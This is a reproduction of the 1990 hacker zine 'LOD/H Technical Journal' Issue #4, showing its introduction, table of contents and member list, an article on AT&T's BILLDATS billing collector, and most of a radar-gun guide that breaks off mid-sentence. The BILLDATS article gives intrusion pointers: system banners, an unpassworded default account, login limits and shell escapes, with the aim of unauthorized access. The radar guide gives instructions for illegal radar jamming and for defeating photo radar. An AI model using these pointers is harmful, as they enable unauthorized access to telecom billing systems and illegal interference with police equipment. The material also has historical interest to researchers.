7471 lines
250 KiB
Plaintext
7471 lines
250 KiB
Plaintext
![]() |
|
|||
|
The LOD/H Technical Journal, Issue #4: File 01 of 10
|
|||
|
Finally Released: May 20, 1990
|
|||
|
|
|||
|
THE
|
|||
|
|
|||
|
LOD/H TECHNICAL JOURNAL
|
|||
|
|
|||
|
INTRODUCTION
|
|||
|
-------------
|
|||
|
|
|||
|
|
|||
|
We are still alive. This publication is not released on any schedule. Past
|
|||
|
attempts at scheduling issues have failed miserably. The editors refuse to
|
|||
|
release issues which are not up to our self-defined standards. We have in the
|
|||
|
past, and will continue in the future, to accept articles from anyone (e.g.
|
|||
|
non LOD) as long as the articles adhere to our basic format and style. The
|
|||
|
editors review all articles to verify accuracy and integrity however it may
|
|||
|
not be possible in all cases to check every fact. Plagiarized material is not
|
|||
|
acceptable and we make every attempt to verify an article's originality. When
|
|||
|
referenced material is used, the source for that material must be clearly
|
|||
|
stated. The more articles we receive the sooner each issue is released. There
|
|||
|
is a minimum 2 month review and editing period for each article. If you want
|
|||
|
to contribute articles contact any member and they will forward articles to
|
|||
|
the editors.
|
|||
|
|
|||
|
There seems to be some confusion as to what writers are (or were) in LOD/H and
|
|||
|
what ones aren't. JUST BECAUSE SOMEONE WRITES FOR THIS PUBLICATION DOES NOT
|
|||
|
MEAN THEY ARE AN LOD/H MEMBER! Just to clear up any confusion, a current
|
|||
|
member list follows:
|
|||
|
|
|||
|
Lord Havok
|
|||
|
Lex Luthor
|
|||
|
Prime Suspect
|
|||
|
Phase Jitter
|
|||
|
Professor Falken
|
|||
|
Skinny Puppy
|
|||
|
|
|||
|
File 06: The History of LOD/H is a short article explaining the origin of the
|
|||
|
group. We realize this is of interest to only a few, and most people probably
|
|||
|
could care less. However, also included is a list of EVERY member who was ever
|
|||
|
in the group. This is to clear up any and all misconceptions about members.
|
|||
|
The press, telecommunications and computer security people, law enforcement,
|
|||
|
and others can finally get their facts straight [See Issue #3, article 10,
|
|||
|
Clearing up the mythical LOD/H Busts for a prime example, and also in the
|
|||
|
Network News and Notes section -- first two articles regarding more so called
|
|||
|
'LOD BUSTS']. Another purpose is to thwart would-be group impostors. SYSOPS
|
|||
|
who give system access to individuals solely because they are a member of some
|
|||
|
respected group are urged to verify the hacker's identity as best they can. No
|
|||
|
one should be taken on their word alone.
|
|||
|
|
|||
|
This issue is dedicated to the three (now "retired") members who recently
|
|||
|
received visits from our friends and yours, the U.S. Secret Service and
|
|||
|
Bell South Security: The Leftist, The Urvile, and The Prophet. Again, see
|
|||
|
the Network News and Notes section for the stories.
|
|||
|
Although the TJ is distributed to many boards, the inability for any decent
|
|||
|
board to consistently remain online prevents us from utilizing "sponsor"
|
|||
|
boards as distribution hubs. Therefore, the TJ will be distributed to whatever
|
|||
|
boards are around at the time of release. Due to the lack of boards the
|
|||
|
newsletter will be distributed in diskette form to those who can help in its
|
|||
|
distribution.
|
|||
|
|
|||
|
|
|||
|
___________________________________________________________________________
|
|||
|
|
|||
|
TABLE OF CONTENTS
|
|||
|
|
|||
|
|
|||
|
Name of article or file Author Size
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
01 Introduction to the LOD/H Technical Journal Staff 04K
|
|||
|
and Table Of Contents for Issue #4
|
|||
|
|
|||
|
02 The AT&T BILLDATS Collector System Rogue Fed 14K
|
|||
|
|
|||
|
03 The RADAR Guidebook Professor Falken 17K
|
|||
|
|
|||
|
04 Central Office Operations Agent Steal 32K
|
|||
|
|
|||
|
05 A Hackers Guide to UUCP The Mentor 27K
|
|||
|
|
|||
|
06 The History Of LOD/H Lex Luthor 12K
|
|||
|
|
|||
|
07 The Trasher's Handbook to BMOSS Spherical Abberation 11K
|
|||
|
|
|||
|
08 The LOD/H Telenet Directory Update #4 Part A Lord Havok 65K
|
|||
|
|
|||
|
09 The LOD/H Telenet Directory Update #4 Part B Lord Havok 43K
|
|||
|
|
|||
|
10 Network News and Notes Staff 38K
|
|||
|
|
|||
|
|
|||
|
Total: 7 Articles 10 Files 263K
|
|||
|
|
|||
|
____________________________________________________________________________
|
|||
|
|
|||
|
End Of Intro/TOC
|
|||
|
Issue #4
|
|||
|
The LOD/H Technical Journal, Issue #4: File 02 of 10
|
|||
|
|
|||
|
|
|||
|
The AT&T BILLDATS Collector
|
|||
|
Written by:
|
|||
|
Rogue Fed
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
|
|||
|
NOTES: This article will hopefully give you a better understanding of how
|
|||
|
the billing process occurs. BILLDATS is just one part of the billing picture.
|
|||
|
Before I began working for the government, I was a Telco employee and thus,
|
|||
|
the information within this article has been learned through experience.
|
|||
|
Unfortunately, I was only employed for a few months (including training on
|
|||
|
BILLDATS) and am still learning more about the many systems that a telco uses.
|
|||
|
There are however, a couple of lists that were compiled and slightly modified
|
|||
|
from what little reference material I could smuggle out and my notes from the
|
|||
|
training class. This article does require a cursory knowledge of telco and
|
|||
|
computer operations (ie. switching, SCCS, UNIX).
|
|||
|
|
|||
|
|
|||
|
INTRODUCTION -
|
|||
|
==============
|
|||
|
|
|||
|
BILLDATS - BILLing DATa System
|
|||
|
|
|||
|
BILLDATS can be explained in a nutshell by the acronym listed above. If it's
|
|||
|
one thing telecommunications providers do well, it's creating acronyms.
|
|||
|
Basically, BILLDATS collects billing information (that's why they call it a
|
|||
|
Collector) from AMATs (Automatic Message Accounting Transmitters). The AMATs
|
|||
|
are situated in or close to switching offices and are connected to BILLDATS
|
|||
|
either through dedicated or dial-up lines. BILLDATS can be considered as
|
|||
|
the "middleman" in the billing process. The system collects, validates, and
|
|||
|
adds identification information regarding origination and destination. This
|
|||
|
is then transferred to tape (or transmitted directly) to the RPC (Regional
|
|||
|
Processing Center) or the RAO (Revenue Accounting Office). The RPC/RAO
|
|||
|
actually processes the billing information. Typically the BILLDATS system is
|
|||
|
located in the same or adjoining building (but can be across town) to
|
|||
|
the RPC/RAO.
|
|||
|
|
|||
|
BILLDATS is similar to many other phone company systems (ie. SCCS) as it uses
|
|||
|
a combination of software. The software base is UNIX and the BILLDATS Generic
|
|||
|
program runs on it. The hardware used is an AT&T 3B20 (this is what 5ESS
|
|||
|
switches use).
|
|||
|
|
|||
|
Some of the more interesting features BILLDATS possesses are:
|
|||
|
|
|||
|
* Can be accessed via dialup (always a plus).
|
|||
|
* Runs under UNIX (another plus).
|
|||
|
* Interface with SCCS (yet another plus).
|
|||
|
* Can store about 12 million calls for the first two disks and about
|
|||
|
8 million calls for each additional disk. A total of 6 (675 MB) disks
|
|||
|
can be used.
|
|||
|
* Inserts the sensor type and ID and recording office type and ID onto
|
|||
|
every AMA record that it collects.
|
|||
|
* Capable of collecting information from nearly 600 AMATs.
|
|||
|
|
|||
|
To better understand how/why you get a bill after making long distance phone
|
|||
|
calls, I have delineated the steps involved.
|
|||
|
|
|||
|
You call Hacker X and tell him all about the latest busts that have occurred,
|
|||
|
he exclaims "Oh Shit!" hangs up on you and throws all his hacking information
|
|||
|
into the fireplace. The actual call is referred to as a call event. As each
|
|||
|
event happens (upon termination of the call) the event is recorded by the
|
|||
|
switch. This information is then sent via an AMA Transmitter which formats the
|
|||
|
information and then sends it to BILLDATS (commonly called a "Host
|
|||
|
Collector"). BILLDATS then provides the information to the RAO/RPC. The
|
|||
|
billing computer is located at the RAO/RPC. Do not confuse the actual billing
|
|||
|
system with BILLDATS! The billing computer:
|
|||
|
|
|||
|
* Contains customer records
|
|||
|
* Credit ratings (in some telcos)
|
|||
|
* Totals and prints the bill
|
|||
|
* Generates messages when customers do not pay (ie. last chance and
|
|||
|
temporary termination of service)
|
|||
|
|
|||
|
When the billing period is over, (typically 25-30 days), many events (it
|
|||
|
depends on how many calls you have made) have accumulated. A bill is then
|
|||
|
generated and mailed to you.
|
|||
|
|
|||
|
|
|||
|
COLLECTION -
|
|||
|
============
|
|||
|
|
|||
|
BILLDATS collects information in two ways:
|
|||
|
|
|||
|
1. AMATs
|
|||
|
2. Users
|
|||
|
|
|||
|
AMAT input
|
|||
|
----------
|
|||
|
|
|||
|
BILLDATS collects data from the AMAT either directly from the switch, or from
|
|||
|
a front end which performs some processing on the data before giving it to
|
|||
|
BILLDATS. The data I am talking about here is usually AMA billing information.
|
|||
|
The information is in the usual AMA format (see Phantom Phreaker's article in
|
|||
|
the LOD/H Technical Journal, Issue #3 on AMA for formats and other info). As
|
|||
|
I said earlier, the recording office and sensor types and IDs have to be
|
|||
|
added by BILLDATS. The other information that is transmitted is usually
|
|||
|
maintenance data.
|
|||
|
|
|||
|
The data that is transferred between BILLDATS and an AMAT is accomplished
|
|||
|
over either dedicated or dialup lines using the BX.25 protocol. This protocol
|
|||
|
has been adopted by the telecommunications industry as a whole. It is
|
|||
|
basically a modified version of X.25.
|
|||
|
|
|||
|
User input
|
|||
|
----------
|
|||
|
|
|||
|
This is simply sysadmin and sysop information.
|
|||
|
|
|||
|
|
|||
|
INSERTED INFORMATION -
|
|||
|
======================
|
|||
|
|
|||
|
Once the information is collected, additional data (mentioned earlier)
|
|||
|
must be inserted. The information that BILLDATS inserts into the AMA records
|
|||
|
it receives depends on whether the AMAT is a single or multi-switch AMAT.
|
|||
|
Either way, the data is passed through the DEP. The DEP is a module which
|
|||
|
is part of the LHS (Link Handler Subsystem) that actually inserts the
|
|||
|
additional data. It also performs other functions which are rather
|
|||
|
uninteresting to the hacker. The LHS manages the x-mission of all the
|
|||
|
collected information. This is either through dedicated or dialup lines. The
|
|||
|
LHS is responsible for:
|
|||
|
|
|||
|
* Logging of statistics as related to the performance of links.
|
|||
|
* Polling of remote switches for maintenance and billing information.
|
|||
|
* Passing information to the DEP in which additional information is
|
|||
|
inserted.
|
|||
|
* Storing billing information.
|
|||
|
* Other boring stuff.
|
|||
|
|
|||
|
|
|||
|
AMATS -
|
|||
|
=======
|
|||
|
|
|||
|
Basically an AMAT is a front end to the switch. The AMAT:
|
|||
|
|
|||
|
* Gets AMA information from the switch.
|
|||
|
* Formats and processes the information.
|
|||
|
* Transmits it to BILLDATS.
|
|||
|
* An AMAT can also store information for up to 1 week.
|
|||
|
|
|||
|
The following is a list of switches and their related AMAT equipment that
|
|||
|
BILLDATS obtains billing information from:
|
|||
|
|
|||
|
1A ESS: This is usually connected to a 3B APS (Attached Processor System) or
|
|||
|
BILLDATS AMAT.
|
|||
|
2ESS: This is connected to an IBM Series 1 AMAT.
|
|||
|
2BESS: Connected to a BILLDATS AMAT.
|
|||
|
4ESS: Connects to 3B APS.
|
|||
|
5ESS: Direct connection.
|
|||
|
TSPS 3B:Direct connection.
|
|||
|
DMS-10: Connects to IBM Series 1 AMAT.
|
|||
|
|
|||
|
There are other AMATs/Switches but they must be compatible with the BILLDATS
|
|||
|
interface.
|
|||
|
|
|||
|
|
|||
|
ACCESSING BILLDATS -
|
|||
|
====================
|
|||
|
|
|||
|
Even though a system is UNIX based, that doesn't mean that it is a piece of
|
|||
|
cake to get into. Surprisingly (when you think about the average Intelligence
|
|||
|
Quotient of telco personnel) but not surprisingly (when you consider that the
|
|||
|
information contained on the system is BILLING information--the life blood of
|
|||
|
the phone company) BILLDATS is a little more secure than your average telco
|
|||
|
system, except for the fact the all login IDs are 5 lower case characters or
|
|||
|
less. BILLDATS can usually be identified by:
|
|||
|
|
|||
|
bcxxxx 3bunix SV_R2+
|
|||
|
|
|||
|
where:
|
|||
|
|
|||
|
bc = B(ILLDATS) C(ollector).
|
|||
|
xxxx = The node suffix. This is entered when the current Generic is installed.
|
|||
|
3bunix = This simply indicates that UNIX is running on an AT&T 3Bxx system.
|
|||
|
SV_R2+ = Software Version.
|
|||
|
|
|||
|
The good news is that there is a default username when the system is
|
|||
|
installed. The bad news is that upon logon, the system forces you to choose a
|
|||
|
password. The default username is not passworded initially. The added security
|
|||
|
feature is simply that the system forces all usernames to have passwords. If
|
|||
|
it doesn't have an associated password, the system will give you the message:
|
|||
|
|
|||
|
"Your password has expired. Choose a new one"
|
|||
|
|
|||
|
A 6-8 character password must then be entered. After this you will be asked
|
|||
|
to enter the terminal type. The ones provided are AT&T terminals (615, 4425,
|
|||
|
and 5420 models). Once entered a welcome message will probably be displayed:
|
|||
|
|
|||
|
"Welcome to the South Western Bell BILLDATS Collector"
|
|||
|
"Generic 3, Issue 1"
|
|||
|
"Tuesday 01 Aug 1989 12:44:44 PM"
|
|||
|
|
|||
|
dallas>
|
|||
|
|
|||
|
The BILLDATS prompt was displayed "dallas>" where dallas is the node name.
|
|||
|
|
|||
|
There are 3 privilege levels within BILLDATS:
|
|||
|
|
|||
|
1. Administrator
|
|||
|
2. Operator
|
|||
|
3. UUCP
|
|||
|
|
|||
|
* Administrator privs are basically root privs.
|
|||
|
* An account with Operator privs can still do about anything an Admin can do
|
|||
|
except make data base changes.
|
|||
|
* UUCP privs are the lowest and allow file transfer.
|
|||
|
|
|||
|
|
|||
|
Commands
|
|||
|
--------
|
|||
|
|
|||
|
Just like SCCS, UNIX commands can be entered while using BILLDATS. The format
|
|||
|
is:
|
|||
|
|
|||
|
dallas>run-unx:$unix cmd;
|
|||
|
|
|||
|
All unix commands must be preceded by "run-unx:" and end with a semicolon ";".
|
|||
|
The semicolon is the command terminator character (just like Carriage Return).
|
|||
|
|
|||
|
BILLDATS isn't exactly user friendly, but it does have on-line help. There are
|
|||
|
a number of ways that it can be obtained:
|
|||
|
|
|||
|
dallas> help-?; or help-??; or ?-help; or ??-help;
|
|||
|
|
|||
|
If you want specific help:
|
|||
|
|
|||
|
dallas> help-(command name);
|
|||
|
|
|||
|
I can list commands forever, but between UNIX (commands every hacker should
|
|||
|
be familiar with) and help (any moron can use it), you can figure out which
|
|||
|
ones are important.
|
|||
|
|
|||
|
|
|||
|
Error Messages
|
|||
|
--------------
|
|||
|
|
|||
|
Just like SCCS, BILLDATS has some rather cryptic error messages. There are
|
|||
|
thousands of error messages, once you know a little about the format they
|
|||
|
are easier to understand. When a mistake is made, something similar to
|
|||
|
the following will appear:
|
|||
|
|
|||
|
UI0029 (attempted command) is not a valid input string.
|
|||
|
|
|||
|
^ ^- error message information
|
|||
|
|
|
|||
|
|-- This is the subsystem and error message number
|
|||
|
|
|||
|
The following is a brief description of subsystem abbreviations:
|
|||
|
|
|||
|
BD: BILLDATS system utilities. Errors associated with the use of utility
|
|||
|
programs will be displayed.
|
|||
|
DB: Data Base manager. These messages are generated when accessing or
|
|||
|
attempting to access the various Data Bases (explained later) within
|
|||
|
BILLDATS.
|
|||
|
DM: Disk Manager. Basically, information pertaining to the system disk(s).
|
|||
|
EA: Error and Alarm. As the name implies, system errors and alarms.
|
|||
|
LH: Link Handler. Messages related to data link activity, either between
|
|||
|
BILLDATS and the AMAT or BILLDATS and the RAO/RPC.
|
|||
|
SC: Scheduler. The scheduler is BILLDATS' version of the UNIX cron daemon.
|
|||
|
BILLDATS uses cron to schedule things like when to access remote systems.
|
|||
|
TW: Tape Writer. Messages related to storing billing information on tapes
|
|||
|
which will then be transported to the RAO/RPC.
|
|||
|
UI: User Interface. This was used in the above example. Displays syntax,
|
|||
|
range or status errors when entering commands.
|
|||
|
DL: Direct Link. Instead of BILLDATS information being written to tape, a
|
|||
|
direct link to the RPC/RAO mainframe (the actual billing system computer)
|
|||
|
can be accomplished. This is usually done when BILLDATS is located far
|
|||
|
away from the RPC/RAO office as there is always some risk involved in
|
|||
|
transporting tapes, and that risk increases the farther away the two
|
|||
|
offices are. Another neat thing about Direct Link is that the billing data
|
|||
|
can be sent across a LAN (Local Area Network) also. Obviously this incurs
|
|||
|
some concerns regarding security, but from what I have heard and seen,
|
|||
|
AT&T and the BOC's typically choose to ignore the security of their
|
|||
|
systems which suits me just fine. The Direct Link is an optional BILLDATS
|
|||
|
feature and if it is in use, messages related to its operation are
|
|||
|
displayed with the DL prefix.
|
|||
|
|
|||
|
|
|||
|
BILLDATS DATA BASES -
|
|||
|
=====================
|
|||
|
|
|||
|
The databases contain all kinds of useful information such as usernames,
|
|||
|
switch types, scheduled polling times, etc.
|
|||
|
|
|||
|
The AMAT Data Base contains:
|
|||
|
|
|||
|
* Type of switch
|
|||
|
* Sensor type and identification
|
|||
|
* AMAT phone number
|
|||
|
* Channel and port number/group
|
|||
|
* Other boring information
|
|||
|
|
|||
|
The Port Data Base contains:
|
|||
|
|
|||
|
* Communications information (like L-Dialers on UNIX Sys. V)
|
|||
|
* Channel and port information
|
|||
|
* Other boring information
|
|||
|
|
|||
|
The Collector Data Base contains:
|
|||
|
|
|||
|
* Collector office ID
|
|||
|
* Version number of the Data Base
|
|||
|
* Number and speed of any remote terminals
|
|||
|
* When reports are scheduled for output
|
|||
|
* Other boring information
|
|||
|
|
|||
|
|
|||
|
CONCLUSION -
|
|||
|
============
|
|||
|
|
|||
|
If you are not technically oriented, I hope this article helped you understand
|
|||
|
how you get your bill. I assumed that you would skip over the commands for
|
|||
|
using BILLDATS and similar information.
|
|||
|
|
|||
|
If you are technically oriented, I hope I not only helped you understand more
|
|||
|
about the billing process, but also increased your awareness of how detailed
|
|||
|
the whole process is. And if you do happen to stumble onto a BILLDATS system,
|
|||
|
you have been pointed in the right direction as far as using it correctly is
|
|||
|
concerned.
|
|||
|
|
|||
|
I tried to leave out all the boring details, but some may have slipped by me.
|
|||
|
I reserved the right to omit specific details and instructions regarding any
|
|||
|
alteration or deletion of calls/charges for my own use/abuse.
|
|||
|
|
|||
|
The Rogue Federal Agent
|
|||
|
|
|||
|
|
|||
|
[ End Of Article ]
|
|||
|
|
|||
|
The LOD/H Technical Journal, Issue #4: File 03 of 10
|
|||
|
|
|||
|
|
|||
|
The Radar Guidebook
|
|||
|
by
|
|||
|
Professor Falken
|
|||
|
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
Anyone who has driven a car without a radar detector before, has gotten
|
|||
|
that paranoid feeling that the cops are around radaring. This feeling is not
|
|||
|
a nice one; it is the feeling that somewhere somehow someone is watching you.
|
|||
|
In this article I will attempt to explain how radar guns work, what bands
|
|||
|
the guns work on, why they are wrong 70% of the time, how to employ stealth
|
|||
|
technology in defeating the radar, and last but not least jamming the radar.
|
|||
|
|
|||
|
RADAR stands for RAdio Detecting And Ranging. A speed-radar gun works
|
|||
|
under the Doppler theory. This theory is that when a signal is reflected off
|
|||
|
an object moving toward you, the signal will be at a higher frequency than the
|
|||
|
initial frequency, this increase in frequency is used to calculate speed.
|
|||
|
Many of you have experienced the Doppler effect, which occurs when a noise
|
|||
|
from a siren increases in strength (gets louder) as it approaches and
|
|||
|
decreases in strength (gets softer) as it moves away from you.
|
|||
|
|
|||
|
Right now in the United States, there are three bands that are Federal
|
|||
|
Communication Commission (FCC) certified for "field disturbance sensors",
|
|||
|
known to you and me as radar guns. These bands have proper non-technical
|
|||
|
names, and all operate in the GigaHertz range. GigaHertz is a measure of
|
|||
|
frequency; one GHz equals one billion cycles per second. Most frequency
|
|||
|
modulation (FM) radio broadcasts are made in the 0.088 GHz to 0.108 GHz band,
|
|||
|
in MegaHertz that is 88 MHz to 108 MHz. The three proper names for these
|
|||
|
radar bands are: X, K, and Ka.
|
|||
|
|
|||
|
One of the older radar bands is the X band. X band radar is the most
|
|||
|
commonly used radar band in the United States. X band radar transmits its
|
|||
|
signal at 10.5250 GHz. The wattage of the radar's signal really depends upon
|
|||
|
the gun manufacturer. However, most manufacturers agree that a 100 milliwatt
|
|||
|
signal is "High-Power" and the 40 milliwatt range is "Low Power". The gun's
|
|||
|
range also depends upon the manufacturer. The average maximum range of a X
|
|||
|
band gun is 2500 feet. That estimate is based on the assumption that the gun
|
|||
|
is operating at full-strength (100mw). Most radar detectors give off a
|
|||
|
false signals on this band due to ultrasonic motion detectors employed
|
|||
|
by various burglar alarm systems. Large grocery stores also use these to
|
|||
|
open the doors magically as you walk in or out.
|
|||
|
|
|||
|
Another older band is K band. K band operates on 24.150 GHz and is not as
|
|||
|
popular as X band, but it is gaining in usage throughout the country. The
|
|||
|
normal signal strength of K band guns again depends upon the manufacturer,
|
|||
|
but the ones I've seen all operate at 100 milliwatts at high-power. These
|
|||
|
guns have a maximum range of 3000 feet, assuming they are at 100mw signal
|
|||
|
strength.
|
|||
|
|
|||
|
A new type of radar has been introduced and assigned a frequency by the
|
|||
|
Federal Communications Commission. This new band has been assigned the name
|
|||
|
Ka and has been designated a frequency of 34.360 GHz. Current Ka technology
|
|||
|
gives the gun a maximum effective range of 40 to 200 feet. This band
|
|||
|
was originally made for use with photo-radar. The photo-radar can be set up
|
|||
|
on a tripod on the side of the road or in the back of a police car. The
|
|||
|
user then triggers a button when he wants a car in the guns range
|
|||
|
clocked, automatically taking a picture of the car & license plate.
|
|||
|
At the time the photograph is taken a date and time is imprinted on the
|
|||
|
picture. The police keep one duplicate for archival purposes and sends the
|
|||
|
other to the registered owner of the car along with ticket information and the
|
|||
|
amount due. This type of system can only work in places that hold the owner
|
|||
|
of a vehicle responsible for any violations that occur with the car. The
|
|||
|
legal barriers for photo radar to overcome are extensive, most notably, not
|
|||
|
giving the vehicle owner due process and the presumption of guilt. There is
|
|||
|
a system out now for $19.95 that defeats Ka band photo radar. I expect it to
|
|||
|
be illegal VERY QUICKLY once Ka is more widely used. This little baby slips
|
|||
|
over your license plate and acts as venetian blinds. When looking straight at
|
|||
|
the plate it looks like a normal plate with a black frame. However when
|
|||
|
looking at it from a Ka band Photo Radar's angle it looks like a license plate
|
|||
|
with a silver streak covering the whole plate, making it impossible to
|
|||
|
identify. This device is called the Photobuster and is available from
|
|||
|
most radar detector specialty stores.
|
|||
|
|
|||
|
There are two different types of radar guns. They are Instant-On/Pulse and
|
|||
|
Constant Broadcasting Radar. The names are self-explanatory, but I will
|
|||
|
explain them anyway. The constant broadcast radar continually transmits
|
|||
|
its radar signal, and anything in its path will be clocked. Instant-On &
|
|||
|
Pulse radars are basically identical, and are both very deadly since they are
|
|||
|
harder to detect as a threat. The Instant-On gun is really nothing more than
|
|||
|
an ON/OFF switch for signal transmission. In order to have a pulse gun, all
|
|||
|
a cop has to do is purchase one with a "HOLD" feature or just turn the gun
|
|||
|
on when he/she wishes to use it. The "HOLD" feature is simply a button that
|
|||
|
keeps the gun on but makes sure no signal is being transmitted. No one can
|
|||
|
detect a gun that is off or in "HOLD" mode. An officer using an Instant-On
|
|||
|
radar gun will periodically check the speed of the traffic. These samplings
|
|||
|
can easily be detected and will give the user of a detector prior warning to
|
|||
|
a Instant On/Pulse activated radar gun.
|
|||
|
|
|||
|
Many detectors on the market today provide anti-falsing circuitry. Falsing
|
|||
|
is the triggering of the radar detector from something other than a radar gun.
|
|||
|
|
|||
|
One or two detector manufactures make their detectors with GaAs diodes.
|
|||
|
GaAs diodes are Gallium Arsenide diodes which are a military grade electrical
|
|||
|
component that helps produce a good signal-to-noise ratio.
|
|||
|
|
|||
|
All new model radar detectors use Superheterodyne technology.
|
|||
|
Superheterodyne, also known as active technology, amplifies all incoming
|
|||
|
signals hundreds of times, which makes it more sensitive and selective as to
|
|||
|
which signals will trigger an alert. Superheterodyne technology also gives
|
|||
|
out a minute internal radar signal of its own, which can be picked up by older
|
|||
|
(Pre/Early 1980's) non-anti-falsing radar detectors. If you have a newer
|
|||
|
model radar detector, this small internally generated signal is no problem to
|
|||
|
your's or anyone's anti-falsing radar detecting unit. NOTE: In states
|
|||
|
where radar detectors are illegal (Ex. Virginia, Canada) the police have
|
|||
|
devices which detect this Superheterodyne signal. Police can then stop
|
|||
|
you and confiscate your detector. Getting around this police tactic
|
|||
|
would be to use an early radar detector without Heterodyne/Superheterodyne
|
|||
|
detection technology.
|
|||
|
|
|||
|
Many compact/shirt pocket radar units are "exclusively made with SMD's".
|
|||
|
These SMD's are Surface Mounted Devices and contain extremely small resistors,
|
|||
|
transistors, diodes, and capacitors. Just because a manufacturer uses SMD's,
|
|||
|
that does NOT make the unit any better than a larger detector of the same age.
|
|||
|
|
|||
|
Cincinnati Microwave Inc., the makers of Escort and Passport say they have
|
|||
|
the exclusive technology for the detection and anti-falsing of RASHID VRSS
|
|||
|
technology. RASHID VRSS is actually the Rashid Radar Safety Brake Collision
|
|||
|
Warning System. It is an electronic device that operates on K band
|
|||
|
frequencies and warns heavy trucks and ambulances of hazards in their path.
|
|||
|
About 900 RASHID VRSS units have been prototyped in three states. Since the
|
|||
|
number of actual operating RASHID units is so minute, I really doubt you will
|
|||
|
run into one.
|
|||
|
|
|||
|
There are two ways a radar gun can produce an incorrect speed reading.
|
|||
|
These are known as the Cosine Error and Moving Radar Error. The Cosine Error
|
|||
|
occurs when a radar gun gives a lower reading than the actual speed of the
|
|||
|
target. This occurs because the gun can only measure the doppler shift that
|
|||
|
occurs directly towards or away from the antenna. If the object moves at an
|
|||
|
angle to the gun, the shift will be lower than if it moves directly at the
|
|||
|
antenna. Therefore the reading the radar gun gives will be less than the
|
|||
|
actual speed of the object. The radar reading can be calculated by taking
|
|||
|
the Actual Speed times the cosine of the incidence angle. So if the target
|
|||
|
car's actual speed is 50 miles per hour and it is 37 degrees off of the
|
|||
|
mainline radar signal, the radar speed will be 40 miles per hour. Look:
|
|||
|
|
|||
|
Cosine Error Theory:
|
|||
|
Actual Speed x Cosine of Incidence Angle = Radar's Shown Speed
|
|||
|
|
|||
|
Cosine of 37 degrees is 0.80
|
|||
|
50 MPH x 0.80 = 40 MPH
|
|||
|
|
|||
|
So if you see a radar enabled cop coming head-on towards you it would be a
|
|||
|
good idea to get into the right hand lane, or further if possible, as this
|
|||
|
increases the angle and thus lowers your radar speed. The other error is the
|
|||
|
Moving Radar Error, which occurs only when a police car is using a moving
|
|||
|
radar gun. A false reading is obtained by the unit because before it
|
|||
|
can radar you it must radar something along side the road to get the patrol
|
|||
|
car's speed. Most often, billboards and parked cars are used for this initial
|
|||
|
patrol car speed calibration. It is susceptible to errors because of the
|
|||
|
Cosine Error, mentioned above. Once the patrol car has its speed (wrong or
|
|||
|
not), it assumes that the target's (YOU) speed is the difference between the
|
|||
|
highest oncoming signal and the patrol speed; but if the patrol speed is lower
|
|||
|
it will ADD that error on to the target speed. So the target speed (YOU) will
|
|||
|
read higher than you were actually traveling. Here's the theory and a
|
|||
|
problem:
|
|||
|
|
|||
|
Moving Radar Theory:
|
|||
|
Closing Speed - Patrol Speed = Target Speed
|
|||
|
|
|||
|
The ACTUAL speeds for these are:
|
|||
|
Patrol Car Speed - 60 MPH
|
|||
|
Target Car Speed - 60 MPH
|
|||
|
Closing Speed - 120 MPH
|
|||
|
|
|||
|
Due to the Cosine Error the TARGET CAR's speed will cause the gun to
|
|||
|
calculate a LOW reading for the actual patrol car's speed due to the cosine
|
|||
|
error.
|
|||
|
|
|||
|
The RADAR calculated speeds are:
|
|||
|
Patrol Car Speed - 50 MPH
|
|||
|
Target Car Speed - 70 MPH
|
|||
|
Closing Speed - 120 MPH
|
|||
|
|
|||
|
Thus you can see how the police car is going to get an incorrect reading.
|
|||
|
This is a good one to memorize and bring into court for any tickets.
|
|||
|
|
|||
|
It's been recently brought to my attention that there are stealth-bras for
|
|||
|
cars. From what I understand, the bras actually absorb the radar, and reflect
|
|||
|
such a weakened signal that the radar gun cannot detect it. I have not seen
|
|||
|
one of these in person, but from what I have heard they are made out of a VERY
|
|||
|
DENSE rubber/metal composite. The bra probably traps the signal very much
|
|||
|
like the F-117/B-2 stealth aircraft do. The material is probably made up of
|
|||
|
hexagonal shaped cells, the back of the cell being at a slight angle, so that
|
|||
|
any signal coming into the cell will have to bounce around within the cell
|
|||
|
before exiting it. The inside of each cell is filled with a radar absorbing
|
|||
|
material. As the signal hits the back of the hexagonal cell it is bounced
|
|||
|
around inside the cell through the absorbing material, weakening the signal
|
|||
|
each time it does so. Upon leaving the cell, the signal is so weak the
|
|||
|
radar's receiver may not pick up the signal until the target is near enough
|
|||
|
to give a positive return on the radar screen. When the aircraft is getting
|
|||
|
closer, within radar range, the signal reflected may be so small the radar's
|
|||
|
controller may think he is picking up ground interference, a flock of birds
|
|||
|
or possibly bad weather. The actual radar absorbing material is classified at
|
|||
|
this time by the government. The actual composite on the car bra is certainly
|
|||
|
not as good as the actual radar absorption material of the aircraft, but I'm
|
|||
|
sure it is somewhat similar.
|
|||
|
|
|||
|
Radar jamming is done very much the way any other type of radio jamming is
|
|||
|
done. You simply overpower the frequency being used with a frequency of your
|
|||
|
own. Radar jamming/overpowering is ILLEGAL in the United States. To jam a
|
|||
|
signal all you need is a transmitter, an amplifier and an antenna. To jam a
|
|||
|
gun using a K band radar (24.150 GHz) all you do is get a transmitter that can
|
|||
|
transmit in the 20 GHz range and a 10-100 watt amplifier and antenna. Send
|
|||
|
out a signal at around 24.05 GHz. This signal will make the cop's radar
|
|||
|
either show a 0 or an incredibly slow speed such as -520. Usually the
|
|||
|
cop's radar cannot show a negative sign, so it will just be 520. This
|
|||
|
10-100 watt signal that you are transmitting will overpower the signal
|
|||
|
his/her radar sent out and is waiting to receive. His/her gun is only at
|
|||
|
100 milliwatts, and you're transmitting at 10-100 watts; its like using a
|
|||
|
12-gauge shotgun against a rodent.
|
|||
|
|
|||
|
Where can you get microwave transmission equipment? You can check local
|
|||
|
electronic shops, satellite stores, Cable TV companies and local television
|
|||
|
stations as to where they buy their microwave transmission gear. Or you can
|
|||
|
buy a radar gun of your own, and leave it ON whenever your driving. This will
|
|||
|
give the cop's gun a very strange reading, most likely zero. If it is
|
|||
|
possible, once you have the gun bring it to a "corrupt" electronics shop and
|
|||
|
have it modified for high powered transmission, preferably in the 10 to 100
|
|||
|
watt range.
|
|||
|
|
|||
|
Some radar guns have resistors implemented just before the antenna, but
|
|||
|
just after the amplifier for de-amplification of the transmitter's signal.
|
|||
|
This means that most guns already have a good (1 watt or so) transmit
|
|||
|
capacity, but it is suppressed to bring the actual transmit signal to the
|
|||
|
100mw area. The owner of the gun only has to know which resistors to take
|
|||
|
